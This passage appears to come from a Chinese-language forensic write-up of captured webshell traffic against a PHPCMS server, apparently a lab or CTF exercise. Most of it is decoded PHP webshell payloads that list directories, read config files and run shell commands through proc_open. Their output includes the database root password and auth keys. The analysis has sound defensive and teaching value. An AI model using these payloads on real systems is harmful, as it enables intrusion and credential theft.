@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

然后再看另一个小马文件 :

grep -n -C 32 'POST /uploadfile/2017/0905/20170905055411283.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' > base64
http ›› ipython                                                                                                                                                                              
In [1]: with open("base64") as f:
   ...:     for line in f:
   ...:         print line[2:-12].decode("base64")
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/crons/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/crons/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件
X@Yphpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/api.php 内容
<?php                  
/**                       
 *  index.php API ....    
 *                        
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-7-26
 */                       
define('PHPCMS_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
include PHPCMS_PATH.'phpcms/base.php';
$param = pc_base::load_sys_class('param');
$_userid = param::get_cookie('_userid');
if($_userid) {            
    $member_db = pc_base::load_model('member_model');
    $_userid = intval($_userid);
    $memberinfo = $member_db->get_one(array('userid'=>$_userid),'islock');
    if($memberinfo['islock']) exit('<h1>Bad Request!</h1>');
}                         
$op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty');
if (isset($_GET['callback']) && !preg_match('/^[a-zA-Z_][a-zA-Z0-9_]+$/', $_GET['callback']))  unset($_GET['callback']);
if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) {
    include PHPCMS_PATH.'api/'.$op.'.php';
} else {                  
    exit('API handler does not exist');
}                         
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/ 下的所有文件
model/   2017-09-03 03:31:17 4096    0777
libs/   2017-09-03 03:31:16 4096    0777
languages/  2017-09-03 03:31:15 4096    0777
./  2017-09-03 03:31:27 4096    0777
plugin/ 2017-09-03 03:31:27 4096    0777
templates/  2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:38:34 4096    0777
modules/    2017-09-03 03:31:27 4096    0777
base.php    2017-09-03 03:31:15 8462    0777
index.html  2017-09-03 03:31:15 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/phpcms/base.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/phpcms/base.php 内容
<?php
/**
 *  base.php PHPCMS............
 *
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-6-7
 */
define('IN_PHPCMS', true);                                                                     
//PHPCMS........
define('PC_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
if(!defined('PHPCMS_PATH')) define('PHPCMS_PATH', PC_PATH.'..'.DIRECTORY_SEPARATOR);
...

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/ 下的所有文件
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/configs/ 下的所有文件
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/system.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/caches/configs/system.php 内容
X@Y<?php                 
return array(            
//........               
'web_path' => '/',                                                                                                     
//Session....     
'session_storage' => 'mysql',
'session_ttl' => 1800,   
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,        
//Cookie....             
'cookie_domain' => '', //Cookie ......
'cookie_path' => '', //Cookie ........
'cookie_pre' => 'LTBnY_', //Cookie ......................................Cookie....
'cookie_ttl' => 0, //Cookie ..........0 ................
//............           
'tpl_root' => 'templates/', //................
'tpl_name' => 'default', //................
'tpl_css' => 'default', //............
'tpl_referesh' => 1,     
'tpl_edit'=> 0,//....................
//............           
'upload_path' => PHPCMS_PATH.'uploadfile/',
'upload_url' => 'http://192.168.20.88/uploadfile/', //........
'attachment_stat' => '1',//.................... 0 .... 1 ...... ....: ......................
'js_path' => 'http://192.168.20.88/statics/js/', //CDN JS
'css_path' => 'http://192.168.20.88/statics/css/', //CDN CSS
'img_path' => 'http://192.168.20.88/statics/images/', //CDN img
'app_path' => 'http://192.168.20.88/',//................
'charset' => 'gbk', //..........
'timezone' => 'Etc/GMT-8', //..............php 5.1................Etc/GMT-8 ............ GMT+8
'debug' => 0, //................
'admin_log' =>           
17:57:02.163812 IP 192.168.20.117.1423 > 172.16.10.110.8888: Flags [P.], seq 1461:2610, ack 768, win 63472, length 1149
E....;@...Q|...u..       
n..".-.<X.#o,P...Y... 1, //....................
'errorlog' => 1, //1................ cache/error_log.php | 0................
'gzip' => 1, //....Gzip..........
'auth_key' => 'AivCd1tuXDZfzVOKBybL', //....
'lang' => 'zh-cn',  //..........
'lock_ex' => '1',  //........................................nfs..........
'admin_founders' => '1', //..........ID......ID........
'execution_sql' => 0, //EXECUTION_SQL
'execution_sql' => 0, //EXECUTION_SQL
'phpsso' => '1',    //........phpsso
'phpsso_appid' => '1',  //....id    
'phpsso_api_url' => 'http://192.168.20.88/phpsso_server',   //........
'phpsso_auth_key' => 'AUch7BSWgtuikaORhVcUyOgkyY69Glwb', //........
'phpsso_version' => '1', //phpsso....
'html_root' => '/html',//................
'safe_card'=>'1',//..............
'connect_enable' => '1',    //..................
'sina_akey' => '',  //sina AKEY
'sina_skey' => '',  //sina SKEY
'snda_akey' => '',  //.......... akey
'snda_skey' => '',  //.......... skey
'qq_akey' => '',    //qq skey
'qq_skey' => '',    //qq skey
'qq_appkey' => '',  //QQ........ appkey
'qq_appid' => '',   //QQ........ appid
'qq_callback' => '',    //QQ........ callback
'admin_url' => '',  //..................
);                        
?>


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 whoami
www-data

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;uname -a;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 uname -a
Linux localhost 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ipconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 : pwd
/var/www/html/uploadfile/2017/0905

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 ifconfig
ens33     Link encap:Ethernet  HWaddr 00:0c:29:da:d6:4e  
          inet addr:192.168.20.88  Bcast:192.168.20.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feda:d64e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:150300 errors:0 dropped:0 overruns:0 frame:0
          TX packets:49841 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:162871217 (162.8 MB)  TX bytes:5569466 (5.5 MB)
                         
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:227 errors:0 dropped:0 overruns:0 frame:0
          TX packets:227 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:20038 (20.0 KB)  TX bytes:20038 (20.0 KB)
              

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/ 下的所有文件
./   2017-09-03 03:30:49 4096    0755
html/   2017-09-03 03:38:34 4096    0777
../ 2017-09-03 00:57:48 4096    0755

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件
phpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/ 下的所有文件
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/libs/ 下的所有文件
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/data/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/libs/data/ 下的所有文件
./   2017-09-03 03:31:16 4096    0777
font/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:16 4096    0777
ipdata/ 2017-09-03 03:31:16 4096    0777 
dict/   2017-09-03 03:31:16 4096    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/ 下的所有文件
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/configs/ 下的所有文件
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/database.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/caches/configs/database.php 内容

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 读取文件 /var/www/html/caches/configs/database.php 内容
<?php                 
return array (           
    'default' => array ( 
        'hostname' => 'localhost',
        'port' => 3306,  
        'database' => 'phpcmsv9',
        'username' => 'root',
        'password' => '123456',
        'tablepre' => 'v9_',
        'charset' => 'gbk',
        'type' => 'mysqli',
        'debug' => true,
        'pconnect' => 0,
        'autoconnect' => 0
        ),
);                                           
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件

攻击者的思路以及攻击流程也理清楚了
